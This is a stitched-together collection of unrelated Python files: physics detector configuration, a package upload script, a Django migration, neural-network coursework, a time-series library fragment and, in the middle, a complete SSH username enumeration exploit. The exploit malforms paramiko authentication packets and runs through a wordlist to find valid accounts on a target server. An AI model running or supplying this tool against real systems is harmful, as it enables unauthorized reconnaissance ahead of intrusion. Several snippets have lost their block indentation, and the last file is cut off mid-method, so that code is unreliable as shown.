    process.CSCGeometryESModule.useGangedStripsInME1a = False
    process.idealForDigiCSCGeometry.useGangedStripsInME1a = False
    return process
# CSC digitizer customization
def digitizer_timing_pre3_median(process):
    """Set CSC digitizer bunch-timing offsets (strips and wires)."""
    ## Make sure there's no bad chambers/channels
    #process.simMuonCSCDigis.strips.readBadChambers = True
    #process.simMuonCSCDigis.wires.readBadChannels = True
    #process.simMuonCSCDigis.digitizeBadChambers = True
    ## Customized timing offsets so that ALCTs and CLCTs times are centered in signal BX.
    ## These offsets below were tuned for the case of 3 layer pretriggering
    ## and median stub timing algorithm.
    process.simMuonCSCDigis.strips.bunchTimingOffsets = cms.vdouble(0.0,
        37.53, 37.66, 55.4, 48.2, 54.45, 53.78, 53.38, 54.12, 51.98, 51.28)
    process.simMuonCSCDigis.wires.bunchTimingOffsets = cms.vdouble(0.0,
        22.88, 22.55, 29.28, 30.0, 30.0, 30.5, 31.0, 29.5, 29.1, 29.88)
    return process
# pick up upgrade condions data directly from DB tags using ESPrefer's
def customise_csc_cond_ungangedME11A_mc(process):
    """Attach one PoolDBESSource per unganged-ME11A conditions record and
    ESPrefer it over the default source.

    NOTE(review): `print classname, tag` is Python-2 syntax — this module
    only runs under Python 2 as written.
    """
    # (record name, DB tag) pairs to pick up directly from the DB.
    myconds = [
        ('CSCDBGainsRcd', 'CSCDBGains_ungangedME11A_mc'),
        ('CSCDBNoiseMatrixRcd', 'CSCDBNoiseMatrix_ungangedME11A_mc'),
        ('CSCDBCrosstalkRcd', 'CSCDBCrosstalk_ungangedME11A_mc'),
        ('CSCDBPedestalsRcd', 'CSCDBPedestals_ungangedME11A_mc'),
        ('CSCDBGasGainCorrectionRcd', 'CSCDBGasGainCorrection_ungangedME11A_mc'),
        ('CSCDBChipSpeedCorrectionRcd', 'CSCDBChipSpeedCorrection_ungangedME11A_mc')
    ]
    from CalibMuon.Configuration.getCSCConditions_frontier_cff import cscConditions
    for (classname, tag) in myconds:
        print classname, tag
        # One cloned source per record, named 'unganged_<record>'.
        sourcename = 'unganged_' + classname
        process.__setattr__(sourcename, cscConditions.clone())
        process.__getattribute__(sourcename).toGet = cms.VPSet( cms.PSet( record = cms.string(classname), tag = cms.string(tag)) )
        process.__getattribute__(sourcename).connect = cms.string('frontier://FrontierProd/CMS_COND_CSC_000')
        # Prefer this source for its record over any other provider.
        process.__setattr__('esp_' + classname, cms.ESPrefer("PoolDBESSource", sourcename) )
    del cscConditions
    return process
# Adjust L1Extra producer's input tags
def customize_l1extra(process):
    """Point every l1extraParticles input at the simulated GMT/GCT digis."""
    l1ep = process.l1extraParticles
    #l1ep.centralBxOnly = cms.bool(True)
    #l1ep.produceMuonParticles = cms.bool(True)
    #l1ep.produceCaloParticles = cms.bool(False)
    #l1ep.ignoreHtMiss = cms.bool(False)
    l1ep.muonSource = cms.InputTag('simGmtDigis')
    # All remaining sources come from simGctDigis; some carry an instance
    # label as the InputTag's second argument.
    gct_sources = [
        ('etTotalSource', ()),
        ('nonIsolatedEmSource', ('nonIsoEm',)),
        ('etMissSource', ()),
        ('forwardJetSource', ('forJets',)),
        ('centralJetSource', ('cenJets',)),
        ('tauJetSource', ('tauJets',)),
        ('isolatedEmSource', ('isoEm',)),
        ('etHadSource', ()),
        ('htMissSource', ()),
        ('hfRingEtSumsSource', ()),
        ('hfRingBitCountsSource', ()),
    ]
    for attr, labels in gct_sources:
        setattr(l1ep, attr, cms.InputTag('simGctDigis', *labels))
    return process
def customise_csc_geom_cond_digi(process):
    """Geometry + digitizer-timing customisations (DB conditions step is
    currently disabled)."""
    process = unganged_me1a_geometry(process)
    # process = customise_csc_cond_ungangedME11A_mc(process)
    return digitizer_timing_pre3_median(process)
|
#!/usr/bin/python
import os
import sys
import glob
# Edition name -> package code. Renamed from `map`, which shadowed the
# builtin (and was never read under that name anyway).
edition_codes = {
    'Professional': 'STND',
    'People': 'PEPL',
    'Planner': 'PLNR',
}

for name in ['STND', 'PEPL', 'PLNR']:
    # Each edition directory is expected to hold exactly one built .deb.
    deb = glob.glob('/home/tualatrix/Sources/pagico/%s/*.deb' % name)[0]
    # Replace the distro suffix ("karmic1") with the edition code.
    new_deb = deb.replace('karmic1', name)
    os.system('mv %s %s' % (deb, new_deb))
    # Upload to the destination given as the first CLI argument.
    os.system('scp %s %s' % (new_deb, sys.argv[1]))
|
import datetime

# Format the current time as a human-readable string.
create_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(create_time)
print(type(create_time))  # strftime returns str
data = {}
# BUG FIX: data["img"] always raised KeyError on the empty dict;
# .get() prints None instead of crashing.
print(data.get("img"))
import csv
def inputParse(file):
    """Parse a CMS inpatient-claims CSV and total claim payments per diagnosis.

    Fixes over the original: `reader.next()` (Python-2-only) -> `next(reader)`;
    the file is closed via `with`; all TEN diagnosis columns are scanned (the
    original's `while index < 9` skipped ICD9_DGNS_CD_10); and the
    `summary[visit_diag][]` syntax error is replaced with an accumulation.

    :param file: path to the claims CSV
    :return: {icd9_code: {patient_id: summed_claim_amount}}
    """
    summary = {}
    with open(file) as f:
        reader = csv.reader(f)
        headers = next(reader)
        pat_index = headers.index('DESYNPUF_ID')
        claim_index = headers.index('CLM_PMT_AMT')
        # The ten ICD9 diagnosis columns, _1 through _10.
        diag_indexes = [headers.index('ICD9_DGNS_CD_%d' % i) for i in range(1, 11)]
        for visit in reader:
            patient = visit[pat_index]
            claim = float(visit[claim_index] or 0)
            for diag_index in diag_indexes:
                code = visit[diag_index]
                if not code:
                    continue
                # NOTE(review): the original left this line incomplete
                # (`summary[visit_diag][]`); summing the claim per
                # (diagnosis, patient) is a reconstruction of the apparent
                # intent — confirm against the downstream consumer.
                per_patient = summary.setdefault(code, {})
                per_patient[patient] = per_patient.get(patient, 0.0) + claim
    return summary
if __name__=='__main__':
f = "DE1_0_2008_to_2010_Inpatient_Claims_Sample_1.csv"
inputParse(f)
|
# Generated by Django 2.2.5 on 2019-09-14 22:41
from django.db import migrations
class Migration(migrations.Migration):
    """Rename the db tables backing the factory/line/station/workshop models."""

    dependencies = [
        ('mesfactory', '0001_initial'),
    ]

    operations = [
        migrations.AlterModelTable(
            name='factory',
            table='factory',
        ),
        migrations.AlterModelTable(
            name='line',
            table='line',
        ),
        migrations.AlterModelTable(
            name='station',
            # NOTE(review): 'Station' is capitalized unlike every other table
            # name here — confirm this is intentional.
            table='Station',
        ),
        migrations.AlterModelTable(
            name='workshop',
            table='workshop',
        ),
    ]
|
import sys
import numpy as np
import random
import matplotlib.pyplot as plt
## change Path ##
sys.path.append("/home/elkin/university/gradSchool/Fall2020/CS472/CS472")
from tools import arff, splitData, generatePerceptronData, graph_tools,list2csv
import itertools
import mlp
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder
print("PART 1")
print("DATA SET 1")
arff_path = r"training/linsep2nonorigin.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
## Define the initial Parameters ##
LR = 0.1
DET = 10
SHUFFLE = False
MOMENTUM = 0.5
VALIDATION_SIZE = 0.0
HOTENCODING = True
# data = [[0,0],[0,1]]
# BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, hidden_layer_widths =[2,2,2] ,validationSize = VALIDATION_SIZE, allWeightsValue = 0)
BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, validationSize = VALIDATION_SIZE, allWeightsValue = 0,isHotEncoding= HOTENCODING)
BClass.fit(data,labels)
scores = BClass.score(data,labels)
print("Score ", scores)
# print("Weights")
# print(BClass.get_weights())
list2csv.write_to_csv(BClass.get_weights(),"weightsP1D1.csv")
# clf = MLPClassifier(hidden_layer_sizes=(4,), activation = 'logistic',solver = 'sgd',alpha = MOMENTUM,learning_rate_init = LR, max_iter=2,shuffle = SHUFFLE).fit(data, labels)
print("DATA SET 2")
arff_path = r"training/data_banknote_authentication.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, validationSize = VALIDATION_SIZE, allWeightsValue = 0)
BClass.fit(data,labels)
scores = BClass.score(data,labels)
print("Score ", scores)
# print("Weights")
# print(BClass.get_weights())
list2csv.write_to_csv(BClass.get_weights(),"evaluation.csv")
print("")
print("PART 2 IRIS DATA SET")
arff_path = r"training/iris.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
save_path="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/MSEvsAccuracyIRIS"
save_path3="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/MSE_ValidationTrain"
data_train,data_test , labels_train, labels_test = train_test_split(data, labels, test_size=0.25)
## Define the initial Parameters ##
LR = 0.1
DET = 10
SHUFFLE = True
MOMENTUM = 0.5
VALIDATION_SIZE = 0.25
HOTENCODING = True
BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, validationSize = VALIDATION_SIZE, isHotEncoding= HOTENCODING)
BClass.fit(data_train,labels_train)
print("Number of Epochs to run ", BClass.get_numberEpochs())
scores = BClass.score(data,labels)
print("Score ", scores)
# print("Weights")
# # print(BClass.get_weights())
mse_epochs_val, mse_epochs_training = BClass.get_mse_epochs()
accuracy_epochs = BClass.get_accuracy_epochs()
number_epochs = a_list = list(range(1, BClass.get_numberEpochs()+1))
""" GRAPHS MSE VALIDATION"""
plot_list = []
fig, ax1 = plt.subplots()
ax1.title.set_text('MSE and Accuracy % in Validation and Training Set ')
color = 'tab:red'
ax1.set_xlabel('Number of Epochs')
ax1.set_ylabel('Accuracy % Val Set', color=color)
plot_list.append(ax1.plot(number_epochs, accuracy_epochs, color=color, label = "% Accuracy validation set")[0])
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel('MSE sets') # we already handled the x-label with ax1
# ax2.plot(number_epochs, mse_epochs_val, color=color,label = "MSE validation set")
plot_list.append(ax2.plot(number_epochs, mse_epochs_val, color=color,label = "MSE validation set")[0])
# ax2.tick_params(axis='y', labelcolor=color)
ax3 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:green'
# ax3.plot(number_epochs, mse_epochs_training, color=color, label ="MSE training set")
plot_list.append(ax3.plot(number_epochs, mse_epochs_training, color=color, label ="MSE training set")[0])
# ax3.tick_params(axis='y', labelcolor=color)
ax1.legend(loc='upper center', bbox_to_anchor=(0.5, -0.15), fancybox=True, shadow=False, ncol=5, handles=plot_list,
facecolor = 'white', edgecolor = 'black')
fig.tight_layout() # otherwise the right y-label is slightly clipped
# plt.show()
fig.savefig(save_path)
""" GRAPHS MSE BOTH"""
fig, ax1 = plt.subplots()
ax1.title.set_text('MSE Validation and Training Set')
color = 'tab:red'
ax1.set_xlabel('Number of Epochs')
ax1.set_ylabel('MSE Validation Set', color=color)
ax1.plot(number_epochs, mse_epochs_val, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel('MSE Training Set', color=color) # we already handled the x-label with ax1
ax2.plot(number_epochs, mse_epochs_training, color=color)
ax2.tick_params(axis='y', labelcolor=color)
fig.tight_layout() # otherwise the right y-label is slightly clipped
# plt.show()
fig.savefig(save_path3)
print("")
print("PART 3 VOWEL DATASET")
arff_path = r"training/vowel.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
data = data[:, [0,1,3,4,5,6,7,8,9,10,11,12]]
save_path="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/vowelMSE"
save_path2="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/vowelEpochs"
## Define the initial Parameters ##
LR = 0.1
DET = 10
SHUFFLE = True
MOMENTUM = 0.5
VALIDATION_SIZE = 0.1
HOTENCODING = True
# BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, validationSize = VALIDATION_SIZE,isHotEncoding= HOTENCODING)
# BClass.fit(data_train,labels_train)
# print("Number of Epochs to run ", BClass.get_numberEpochs())
# scores = BClass.score(data_test,labels_test)
# print("Score ", scores)
LRs = [0.005, 0.01, 0.02,0.05,0.1,0.2,0.5,0.75,0.9,2]
MSEs_Training = []
MSEs_Validation = []
MSEs_Test = []
numberEpochsToStop = []
enc = OneHotEncoder()
for lrx in LRs:
data_train,data_test , labels_train, labels_test = train_test_split(data, labels, test_size=0.25)
BClass = mlp.MLPClassifier(lr = lrx,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, validationSize = VALIDATION_SIZE,isHotEncoding= HOTENCODING)
BClass.fit(data_train,labels_train)
numberEpochsToStop.append(BClass.get_numberEpochs())
enc.fit(labels_train)
enc.fit(labels_test)
labels_train_hot = enc.transform(labels_train).toarray()
labels_test_hot = enc.transform(labels_test).toarray()
mse_train = BClass._get_mse_valSet(data_train,labels_train_hot)
mse_val = BClass.getMSEvalSet()
mse_test = BClass._get_mse_valSet(data_test, labels_test_hot)
MSEs_Test.append(mse_test)
MSEs_Training.append(mse_train)
MSEs_Validation.append(mse_val)
x = np.arange(len(LRs)) # the label locations
width = 0.2 # the width of the bars
fig, ax = plt.subplots()
barVal = ax.bar(x - width, MSEs_Validation, width, label='Validation Set')
barTrain = ax.bar(x , MSEs_Training, width, label='Training Set')
barTest = ax.bar(x + width, MSEs_Test, width, label='Test Set')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('MSE')
ax.set_title('Vowel MSE vs. Learning Rate')
ax.set_xticks(x)
ax.set_xticklabels(LRs)
ax.set_xlabel('Learning Rate')
ax.legend()
fig.savefig(save_path)
"""BAR GRAPHS # epochs"""
x = np.arange(len(LRs)) # the label locations
width = 0.35 # the width of the bars
fig, ax = plt.subplots()
numberEpochsStop = ax.bar(x - width/2, numberEpochsToStop, width, label='Epochs')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('# of Epochs to Stop')
ax.set_title('Vowel # Epochs per Learning Rate')
ax.set_xticks(x)
ax.set_xticklabels(LRs)
ax.set_xlabel('Learning Rate')
ax.legend()
fig.savefig(save_path2)
print("")
print("PART 4 VOWEL DATASET")
arff_path = r"training/vowel.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
data = data[:, [0,1,3,4,5,6,7,8,9,10,11,12]]
save_path="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/vowelMSENoded"
## Define the initial Parameters ##
LR = 0.1
DET = 10
SHUFFLE = True
MOMENTUM = 0.5
VALIDATION_SIZE = 0.1
HOTENCODING = True
numberNodes = np.array([2])
ns = 0
numberNodesArray=[]
MSEs_Training = []
MSEs_Validation = []
MSEs_Test = []
numberOfEpochWithNoImprovement= []
bestAccuracy = 0
enc = OneHotEncoder()
while len(numberOfEpochWithNoImprovement) < 1:
numberNodes2 = np.power(numberNodes,ns)
numberNodesList = list(numberNodes2)
print("number Nodes",numberNodesList)
numberNodesArray.append(numberNodes2[0])
data_train,data_test , labels_train, labels_test = train_test_split(data, labels, test_size=0.25)
BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, hidden_layer_widths= numberNodesList, validationSize = VALIDATION_SIZE,isHotEncoding= HOTENCODING)
BClass.fit(data_train,labels_train)
enc.fit(labels_train)
enc.fit(labels_test)
labels_train_hot = enc.transform(labels_train).toarray()
labels_test_hot = enc.transform(labels_test).toarray()
mse_train = BClass._get_mse_valSet(data_train,labels_train_hot)
mse_val = BClass.getMSEvalSet()
mse_test = BClass._get_mse_valSet(data_test, labels_test_hot)
MSEs_Test.append(mse_test)
MSEs_Training.append(mse_train)
MSEs_Validation.append(mse_val)
score_run = BClass.getAccuracyValSet()
if score_run > 0.9999:
break
if abs(bestAccuracy - score_run) < bestAccuracy * 0.00001:
numberOfEpochWithNoImprovement.append("1")
else:
if bestAccuracy < score_run :
bestAccuracy= score_run
numberOfEpochWithNoImprovement.clear()
else:
numberOfEpochWithNoImprovement.append("1")
ns = ns + 1
print(numberNodes)
print(numberOfEpochWithNoImprovement)
print("number nodes ", numberNodesArray)
x = np.arange(len(numberNodesArray)) # the label locations
width = 0.2 # the width of the bars
fig, ax = plt.subplots()
barVal = ax.bar(x - width, MSEs_Validation, width, label='Validation Set')
barTrain = ax.bar(x , MSEs_Training, width, label='Training Set')
barTest = ax.bar(x + width, MSEs_Test, width, label='Test Set')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('MSE')
ax.set_title('Vowel MSE vs. # Nodes in Hidden Layer')
ax.set_xticks(x)
ax.set_xticklabels(numberNodesArray)
ax.set_xlabel('Hidden Layer Nodes')
ax.legend()
fig.savefig(save_path)
print("")
print("PART 5 VOWEL DATASET")
arff_path = r"training/vowel.arff"
dataRaw = arff.Arff(arff=arff_path, label_count=1)
data = dataRaw.data[:,0:-1]
labels = dataRaw.data[:,-1].reshape(-1,1)
data = data[:, [0,1,3,4,5,6,7,8,9,10,11,12]]
save_path="/home/elkin/university/gradSchool/Fall2020/CS472/CS472/backpropagation/plots/vowelEpochsMomentum"
## Define the initial Parameters ##
LR = 0.1
DET = 10
SHUFFLE = True
MOMENTUM = 0.0
VALIDATION_SIZE = 0.1
HOTENCODING = True
ns = 0
MSEs_Training = []
MSEs_Validation = []
MSEs_Test = []
numberOfEpochWithNoImprovement= []
bestAccuracy = 0
momentumList=[]
numberEpochsToStop=[]
enc = OneHotEncoder()
MOMENTUMS = [0.0,0.1,0.2,0.4,0.5,0.6,0.8]
# while len(numberOfEpochWithNoImprovement) < 2:
for MOMENTUM in MOMENTUMS:
momentumList.append(MOMENTUM)
data_train,data_test , labels_train, labels_test = train_test_split(data, labels, test_size=0.25)
BClass = mlp.MLPClassifier(lr = LR,momentum = MOMENTUM, shuffle = SHUFFLE, deterministic = DET, hidden_layer_widths= [16], validationSize = VALIDATION_SIZE,isHotEncoding= HOTENCODING)
BClass.fit(data_train,labels_train)
numberEpochsToStop.append(BClass.get_numberEpochs())
print(momentumList, numberEpochsToStop)
""" GRAPHS MOMENTUM VS EPOCHS """
fig, ax1 = plt.subplots()
ax1.title.set_text('Vowel Epochs vs. Momentum')
color = 'tab:red'
ax1.set_xlabel('Momentum')
ax1.set_ylabel('Epochs', color=color)
ax1.plot(momentumList,numberEpochsToStop, color=color)
ax1.tick_params(axis='y', labelcolor=color)
fig.tight_layout() # otherwise the right y-label is slightly clipped
# plt.show()
fig.savefig(save_path)
|
#!/usr/bin/env python3
import argparse, logging, paramiko, socket, sys, os
class InvalidUsername(Exception):
    """Signals that the probed SSH username was rejected by the server."""
# Replacement for Message.add_boolean: deliberately writes nothing so the
# outgoing auth packet ends up malformed.
def add_boolean(*args, **kwargs):
    """No-op stand-in for paramiko.message.Message.add_boolean."""
    return None
# function that'll be overwritten to malform the packet
# Keep a reference to paramiko's original MSG_SERVICE_ACCEPT handler so the
# patched handler defined below can delegate to it.
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[
    paramiko.common.MSG_SERVICE_ACCEPT]
# malicious function to overwrite MSG_SERVICE_ACCEPT handler
def service_accept(*args, **kwargs):
    """Handle MSG_SERVICE_ACCEPT with Message.add_boolean patched out.

    Temporarily swaps paramiko's Message.add_boolean for the no-op above so
    the auth request packet is malformed, delegates to the original handler,
    then restores the real method (restore happens only on success, matching
    the original control flow).
    """
    saved_add_boolean = paramiko.message.Message.add_boolean
    paramiko.message.Message.add_boolean = add_boolean
    outcome = old_service_accept(*args, **kwargs)
    paramiko.message.Message.add_boolean = saved_add_boolean
    return outcome
# call when username was invalid
def invalid_username(*args, **kwargs):
    """MSG_USERAUTH_FAILURE handler: surface the failure as InvalidUsername."""
    raise InvalidUsername
# assign functions to respective handlers
# Monkey-patch paramiko's client-side auth handler table: malform the auth
# request on SERVICE_ACCEPT and raise InvalidUsername on USERAUTH_FAILURE.
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept
paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username
# Print valid users found out so far
def print_result(valid_users):
    """Print each username in ``valid_users``, or a notice if none were found."""
    if not valid_users:
        print("No valid user detected.")
        return
    print("Valid Users: ")
    for name in valid_users:
        print(name)
# perform authentication with malicious packet and username
def check_user(username):
    """Probe ``username`` against the target SSH server.

    Opens a fresh SSH transport and attempts public-key authentication with
    the malformed auth packet installed by the patched handlers above; the
    server's response distinguishes valid from invalid usernames.

    Returns True if the server treated the username as valid, False if it
    was rejected.  Exits the process (code 2) when the SSH transport cannot
    be negotiated.
    """
    try:
        sock = socket.socket()
        sock.connect((args.target, int(args.port)))
        transport = paramiko.transport.Transport(sock)
        transport.start_client(timeout=0.5)
    except paramiko.ssh_exception.SSHException:
        print('[!] Failed to negotiate SSH transport')
        sys.exit(2)
    try:
        transport.auth_publickey(username, paramiko.RSAKey.generate(2048))
    except paramiko.ssh_exception.AuthenticationException:
        print("[+] {} is a valid username".format(username))
        return True
    # BUG FIX: this was a bare ``except:`` which also swallowed
    # KeyboardInterrupt, defeating the Ctrl-C handling in check_userlist().
    # Catching Exception still handles InvalidUsername (and any other error)
    # while letting KeyboardInterrupt/SystemExit propagate.
    except Exception:
        print("[-] {} is an invalid username".format(username))
        return False
    finally:
        # Close the transport so each probe doesn't leak a socket.
        transport.close()
def check_userlist(wordlist_path):
    """Run check_user() for every username listed in ``wordlist_path``.

    Prints the accumulated results; exits with code 2 when the path is not
    a regular file.  Ctrl-C aborts the enumeration early but still prints
    whatever was found so far.
    """
    if not os.path.isfile(wordlist_path):
        print("[-] {} is an invalid wordlist file".format(wordlist_path))
        sys.exit(2)
    valid_users = []
    with open(wordlist_path) as wordlist:
        for raw_line in wordlist:
            candidate = raw_line.rstrip()
            try:
                if check_user(candidate):
                    valid_users.append(candidate)
            except KeyboardInterrupt:
                print("Enumeration aborted by user!")
                break
    print_result(valid_users)
# remove paramiko logging
logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
# Command-line interface: a target host plus either a single username (-u)
# or a wordlist of usernames (-w).
parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)')
parser.add_argument('target', help="IP address of the target system")
parser.add_argument('-p', '--port', default=22, help="Set port of SSH service")
parser.add_argument('-u', '--user', dest='username', help="Username to check for validity.")
parser.add_argument('-w', '--wordlist', dest='wordlist', help="username wordlist")
# No arguments at all: show usage and bail out.
if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)
args = parser.parse_args()
# A wordlist takes precedence over a single username.
if args.wordlist:
    check_userlist(args.wordlist)
elif args.username:
    check_user(args.username)
else:
    print("[-] Username or wordlist must be specified!\n")
    parser.print_help()
    sys.exit(1)
|
import copy
from collections.abc import Iterable
import numpy as np
__all__ = ["load", "TimeSeries", "DEFAULT_MAX_TIME", "DEFAULT_ERROR_VALUE"]
DEFAULT_MAX_TIME = 1.0
DEFAULT_ERROR_VALUE = 1e-4
def _ndim(x):
"""Return number of dimensions for a (possibly ragged) array."""
n = 0
while isinstance(x, Iterable):
x = x[0]
n += 1
return n
def _compatible_shapes(x, y):
"""Check recursively that iterables x and y (and each iterable contained
within, if applicable), have compatible sizes.
"""
if hasattr(x, "shape") and hasattr(y, "shape"):
return x.shape == y.shape
else:
return len(x) == len(y) and all(
np.shape(x_i) == np.shape(y_i) for x_i, y_i in zip(x, y)
)
def _default_values_like(old_values, value=None, upper=None):
    """Creates a range of default values with the same shape as the input
    `old_values`. If `value` is provided then each entry will equal `value`;
    if `upper` is provided then the values will be linearly-spaced from 0 to
    `upper`.

    Parameters
    ----------
    old_values : (n,) or (p,n) array or list of (n,) arrays
        Input array(s), typically time series measurements for which default
        time or error values need to be inferred.
    value : float, optional
        Value that each output entry will be set to (omitted if `upper` is
        provided).
    upper : float, optional
        Upper bound of range of linearly-spaced output entries (omitted if
        `value` is provided).

    Raises
    ------
    ValueError
        If both, or neither, of `value` and `upper` are given.
    """
    # BUG FIX: this check used to be ``if value and upper:``, which silently
    # accepted value=0.0 together with an `upper` (0.0 is falsy) instead of
    # raising.  Compare against None explicitly.  (Also fixes the "proivded"
    # typo in the error message.)
    if value is not None and upper is not None:
        raise ValueError("Only one of `value` or `upper` may be provided.")
    elif value is not None:
        lower = value
        upper = value
    elif upper is not None:
        lower = 0.0
    else:
        raise ValueError("Either `value` or `upper` must be provided.")
    new_values = copy.deepcopy(old_values)
    if _ndim(old_values) == 1 or (
        isinstance(old_values, np.ndarray) and 1 in old_values.shape
    ):
        # 1-dimensional (or effectively 1-d) input: fill in place.
        new_values[:] = np.linspace(lower, upper, len(new_values))
    else:
        # Multichannel input: fill each channel separately so ragged inputs
        # (lists of different-length arrays) are handled as well.
        for new_array in new_values:
            new_array[:] = np.linspace(lower, upper, len(new_array))
    return new_values
def _make_array_if_possible(x):
"""Helper function to cast (1, n) arrays to (n,) arrrays, or uniform lists
of arrays to (p, n) arrays.
"""
try:
x = np.asfarray(x).squeeze()
except ValueError:
pass
return x
def load(ts_path):
    """Deserialize a TimeSeries object from a .npz file on disk."""
    with np.load(ts_path) as npz_file:
        data = dict(npz_file)
    # Multichannel series are stored as one array per channel (time0, time1,
    # ...); gather them back into a list under the bare key.
    for key in ("time", "measurement", "error"):
        if key in data:
            continue
        n_channels = len([k for k in data if key in k])
        data[key] = [data["{}{}".format(key, i)] for i in range(n_channels)]
    # Scalar metadata was saved as 0-d arrays; unwrap them to plain values.
    for scalar_key in ("name", "label"):
        if scalar_key in data:
            data[scalar_key] = data[scalar_key].item()
    return TimeSeries(
        t=data.get("time"),
        m=data.get("measurement"),
        e=data.get("error"),
        meta_features=dict(zip(data["meta_feat_names"], data["meta_feat_values"])),
        name=data.get("name"),
        label=data.get("label"),
    )
class TimeSeries:
    """Class representing a single time series of measurements and metadata.

    A `TimeSeries` object encapsulates a single set of time-domain
    measurements, along with any metadata describing the observation.
    Typically the observations will consist of times, measurements, and
    (optionally) measurement errors. The measurements can be scalar- or
    vector-valued (i.e., "multichannel"); for multichannel measurements, the
    times and errors can also be vector-valued, or they can be shared across
    all channels of measurement.

    Attributes
    ----------
    time : (n,) or (p, n) array or list of (n,) arrays
        Array(s) of times corresponding to measurement values. If `measurement`
        is two-dimensional, this can be one-dimensional (same times for each
        channel) or two-dimensional (different times for each channel). If
        `time` is one-dimensional then it will be broadcast to match
        `measurement.shape`.
    measurement : (n,) or (p, n) array or list of (n,) arrays
        Array(s) of measurement values; can be two-dimensional for
        multichannel data. In the case of multichannel data with different
        numbers of measurements for each channel, `measurement` will be a list
        of arrays instead of a single two-dimensional array.
    error : (n,) or (p, n) array or list of (n,) arrays
        Array(s) of measurement errors for each value. If `measurement` is
        two-dimensional, this can be one-dimensional (same times for each
        channel) or two-dimensional (different times for each channel).
        If `error` is one-dimensional then it will be broadcast to match
        `measurement.shape`.
    label : str, float, or None
        Class label or regression target for the given time series (if
        applicable).
    meta_features : dict
        Dictionary of feature names/values specified independently of the
        featurization process in `featurize`.
    name : str or None
        Identifying name for the given time series (if applicable).
        Typically the name of the raw data file from which the time series was
        created.
    path : str or None
        Path to the file where the time series is stored on disk (if
        applicable).
    channel_names : list of str
        List of names of channels of measurement; by default these are simply
        `channel_{i}`, but can be arbitrary depending on the nature of the
        different measurement channels.
    """

    def __init__(
        self,
        t=None,
        m=None,
        e=None,
        label=None,
        meta_features=None,
        name=None,
        path=None,
        channel_names=None,
    ):
        """Create a `TimeSeries` object from measurement values/metadata.

        See `TimeSeries` documentation for parameter values.
        """
        if t is None and m is None:
            raise ValueError("Either times or measurements must be provided.")
        elif m is None:
            m = _default_values_like(t, value=np.nan)
        # If m is 1-dimensional, so are t and e
        if _ndim(m) == 1:
            self.n_channels = 1
            if t is None:
                t = _default_values_like(m, upper=DEFAULT_MAX_TIME)
            if e is None:
                e = _default_values_like(m, value=DEFAULT_ERROR_VALUE)
        # If m is 2-dimensional, t and e could be 1d or 2d; default is 1d
        elif isinstance(m, np.ndarray) and m.ndim == 2:
            self.n_channels = len(m)
            if t is None:
                t = _default_values_like(m[0], upper=DEFAULT_MAX_TIME)
            if e is None:
                e = _default_values_like(m[0], value=DEFAULT_ERROR_VALUE)
        # If m is ragged (list of 1d arrays), t and e should also be ragged
        elif _ndim(m) == 2:
            self.n_channels = len(m)
            if t is None:
                t = _default_values_like(m, upper=DEFAULT_MAX_TIME)
            if e is None:
                e = _default_values_like(m, value=DEFAULT_ERROR_VALUE)
        else:
            raise ValueError("m must be a 1D or 2D array, or a 2D list of" " arrays.")
        self.time = _make_array_if_possible(t)
        self.measurement = _make_array_if_possible(m)
        self.error = _make_array_if_possible(e)
        self.sort()  # re-order by time before broadcasting
        if _ndim(self.time) == 1 and _ndim(self.measurement) == 2:
            if isinstance(self.measurement, np.ndarray):
                self.time = np.broadcast_to(self.time, self.measurement.shape)
            else:
                raise ValueError(
                    "Times for each channel must be provided if m" " is a ragged array."
                )
        if _ndim(self.error) == 1 and _ndim(self.measurement) == 2:
